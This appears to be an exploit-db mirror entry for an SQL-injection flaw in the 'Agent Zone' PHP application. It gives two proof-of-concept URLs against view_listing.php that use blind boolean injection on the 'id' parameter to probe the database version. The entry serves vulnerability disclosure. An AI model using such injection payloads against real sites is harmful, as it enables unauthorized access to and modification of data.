exploit-db-mirror/platforms/php/webapps/33242.txt
Offensive Security b20d2a3074 Updated 05_09_2014
2014-05-09 04:36:24 +00:00

8 lines
No EOL
545 B
Text
Executable file

source: http://www.securityfocus.com/bid/36503/info
Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True
http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False